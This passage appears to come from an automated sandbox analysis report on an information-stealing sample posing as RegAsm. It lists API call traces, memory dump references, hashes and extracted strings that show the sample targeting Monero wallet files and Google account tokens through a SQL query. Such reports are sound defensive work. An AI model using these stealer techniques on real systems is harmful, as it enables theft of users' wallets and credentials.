                                                • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                • Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                • Part of subcall function 00401000: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                              • lstrcat.KERNEL32(?,00000000), ref: 00401CB2
                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,?), ref: 00401CBF
                                              • lstrcat.KERNEL32(?,.keys), ref: 00401CDA
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
                                                • Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
                                                • Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
                                                • Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
                                                • Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
                                                • Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
                                                • Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E
                                              • memset.MSVCRT ref: 00401E9D
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                                • Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$lstrcpy$lstrcat$File$AllocCreateHeaplstrlenmemset$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait
                                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                              • API String ID: 1518627966-218353709
                                              • Opcode ID: dedd2ad2299014ab515a3ad46d61034aa91dbba9348d77fadc13e3f741acd75d
                                              • Instruction ID: 3914f70d52a7f87d44e10450272fae8133ffe176783504dfd2c68362267608a7
                                              • Opcode Fuzzy Hash: dedd2ad2299014ab515a3ad46d61034aa91dbba9348d77fadc13e3f741acd75d
                                              • Instruction Fuzzy Hash: D2718071D00249AADB04EBE4D856BDDBB78AF18308F54405EE515B31C2EFB82788CB69
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1f3155648f890b6cd39e2a517c8874802e3ab01cd829446ac9663af1261074bc
                                              • Instruction ID: 0df049b811f71382663f7ca9cac701db1e87043752e799f4d832ba990b2824f4
                                              • Opcode Fuzzy Hash: 1f3155648f890b6cd39e2a517c8874802e3ab01cd829446ac9663af1261074bc
                                              • Instruction Fuzzy Hash: EB816BF5804386CFCB008F24A9417EABBA0AF61600FCC056CE8D5D729ADB35D885CBD2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                              • Instruction ID: 2af6b72bf9dd8c3aa867851366660c5d98c3d1301968158d5dc5bbfebd6a1f73
                                              • Opcode Fuzzy Hash: a70c7127cf5330d89c7d45b3115e672d80e76ffd15e8db3879d2d7a1d690e5da
                                              • Instruction Fuzzy Hash: 9851F0F5A05342ABDB00DE14EC81BEFB3E8EFA4314F40053DF98497201E725AA5987A7
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B701B17
                                              • %s at line %d of [%.10s], xrefs: 1B701B26
                                              • misuse, xrefs: 1B701B21
                                              • block, xrefs: 1B701A90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$block$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-4016964285
                                              • Opcode ID: d85867fbd4bd0cbac3ef780014f4b0ff4baa2a6a7d5a0c84ea1e74d627bd22b8
                                              • Instruction ID: 027347cec0958b363ef164ed58e55b1ee8b35b141fa158fcb15cbbc29023d43e
                                              • Opcode Fuzzy Hash: d85867fbd4bd0cbac3ef780014f4b0ff4baa2a6a7d5a0c84ea1e74d627bd22b8
                                              • Instruction Fuzzy Hash: 8FC1D0B0D042519FCB10CF2AE884ADA77E4FF46B14F05456AFC899B641EB31E954CBA2
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00408A0C
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • lstrlenA.KERNEL32(00000000), ref: 00408C2E
                                                • Part of subcall function 00411B55: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413F3B,00000000,00000000), ref: 00411B6E
                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 00408C53
                                              • lstrlenA.KERNEL32(00000000), ref: 00408D3D
                                              • lstrlenA.KERNEL32(00000000), ref: 00408D51
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00406EF1: _EH_prolog.MSVCRT ref: 00406EF6
                                                • Part of subcall function 00406EF1: memcmp.MSVCRT ref: 00406F1C
                                                • Part of subcall function 00406EF1: memset.MSVCRT ref: 00406F4B
                                                • Part of subcall function 00406EF1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                              • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                              • API String ID: 832884763-1713091031
                                              • Opcode ID: 2b258b7a0fbf6bf663b61f0a99ee6075fec3e006b3052d8592247c947f4d19b0
                                              • Instruction ID: a5afe084f524f6eacdb512f1c52d9d102d198ca90d5d338392595a3e0c8d1b09
                                              • Opcode Fuzzy Hash: 2b258b7a0fbf6bf663b61f0a99ee6075fec3e006b3052d8592247c947f4d19b0
                                              • Instruction Fuzzy Hash: 98C17131804148EEDB09EBE4D959BDDBBB4AF19308F10415EF416731C2EFB82B88CA65
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %llu$%llu$abort due to ROLLBACK$another row available$no more rows available$unknown error
                                              • API String ID: 0-1539118790
                                              • Opcode ID: 20c839746cbd86afea032824759d35412f3f53a1e705489717617129a1abbbe5
                                              • Instruction ID: de56fa975c6789b7f53a0e34bde5d97f1899dc109b784f5dcbc1d46df2460451
                                              • Opcode Fuzzy Hash: 20c839746cbd86afea032824759d35412f3f53a1e705489717617129a1abbbe5
                                              • Instruction Fuzzy Hash: 4E91E2B1A443019BCB08DF28CD94BDABBF1AB99714F04452DF8899B391D736E846CB52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid rootpage$misuse$orphan index
                                              • API String ID: 0-165706444
                                              • Opcode ID: 2f47ab130fe38cef75be53872fc1cf69930b914ea866b7d6b4573e76d7ba899d
                                              • Instruction ID: e22be11dac74e3d4692da294c56fe0b7ba0b2b248ef945e90e925fa21d810bcd
                                              • Opcode Fuzzy Hash: 2f47ab130fe38cef75be53872fc1cf69930b914ea866b7d6b4573e76d7ba899d
                                              • Instruction Fuzzy Hash: 3E6168B5A013856BDF119F20EE81BDFB7A9EF91216F084469FC8586242E321F144CBB2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: bad page number$bad page value$cannot delete$cannot insert$no such schema$read-only
                                              • API String ID: 0-1499782803
                                              • Opcode ID: 1f61132c85c5d1a0c89cb6456d08862d4f3b5ce0cd0e11794136a462ac643dd1
                                              • Instruction ID: 189b3119e908f7900514df28bbaf88efbebbfabcaec5dbe8a78a74ed8221eb16
                                              • Opcode Fuzzy Hash: 1f61132c85c5d1a0c89cb6456d08862d4f3b5ce0cd0e11794136a462ac643dd1
                                              • Instruction Fuzzy Hash: 255104F5A003118BDF048F38DCC6BD777A5AF60654F184469F8498B291E776EC49CB62
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6B913E
                                              • API called with NULL prepared statement, xrefs: 1B6B910D
                                              • %s at line %d of [%.10s], xrefs: 1B6B914D
                                              • misuse, xrefs: 1B6B9148
                                              • API called with finalized prepared statement, xrefs: 1B6B9122
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                              • API String ID: 0-860711957
                                              • Opcode ID: ded4d73806e874c186c8c868479ab166598cd5be82afa37c0bb42a8ddf2db425
                                              • Instruction ID: f15c4acd42305ecb4b4b16a4f3898232b91c4c2d22034cfb911809aa487b0629
                                              • Opcode Fuzzy Hash: ded4d73806e874c186c8c868479ab166598cd5be82afa37c0bb42a8ddf2db425
                                              • Instruction Fuzzy Hash: C94145F1F547425BDB118F349D4ABDB36F9AFA5714F15043CE8868B382E632E44683A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$NULL$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                              • API String ID: 0-538076154
                                              • Opcode ID: e2c2745ebdda25283b576f4c22000d0028fcbfac1cf3d6bcb8709ce6974c88b5
                                              • Instruction ID: 2920338e8836a9e44a01ce394abdebf4d9b7be19a1186b6faf818dbd0473aad5
                                              • Opcode Fuzzy Hash: e2c2745ebdda25283b576f4c22000d0028fcbfac1cf3d6bcb8709ce6974c88b5
                                              • Instruction Fuzzy Hash: E43166B5904349ABDB301B649D40BFF77A5EF85329F400529FCA5E6301E771E6068BA2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heaplstrlenstrchr$AllocH_prologProcessstrcpy_s
                                              • String ID: 0123456789ABCDEF
                                              • API String ID: 1978830238-2554083253
                                              • Opcode ID: e65f6062c3206fcaaefa6c28d1617c679be8f575f83b4505bffea8a7c61f834b
                                              • Instruction ID: 62f6fa5d23d5df559ffb852546e8d7a033c39192c83587afc1619b3f70cd98df
                                              • Opcode Fuzzy Hash: e65f6062c3206fcaaefa6c28d1617c679be8f575f83b4505bffea8a7c61f834b
                                              • Instruction Fuzzy Hash: 0231C072600115AFDB04EFAADC85AEFBBA9EF45354B00443AF511EB1D1DB38D901CBA4
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                              • Instruction ID: a709f1a99fafa144138bb254780b52a7bba652b58200b3eb0a531c5fdff1bab7
                                              • Opcode Fuzzy Hash: d47789057f54d3d5d235375a09c406a209fee87bea1c44866fc0f5d3bf2f426b
                                              • Instruction Fuzzy Hash: 192183FAD0235276EB02AE215C02FFF729C5F75216F0588A8FD95A2140F734E65982A7
                                              Strings
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B79FB96
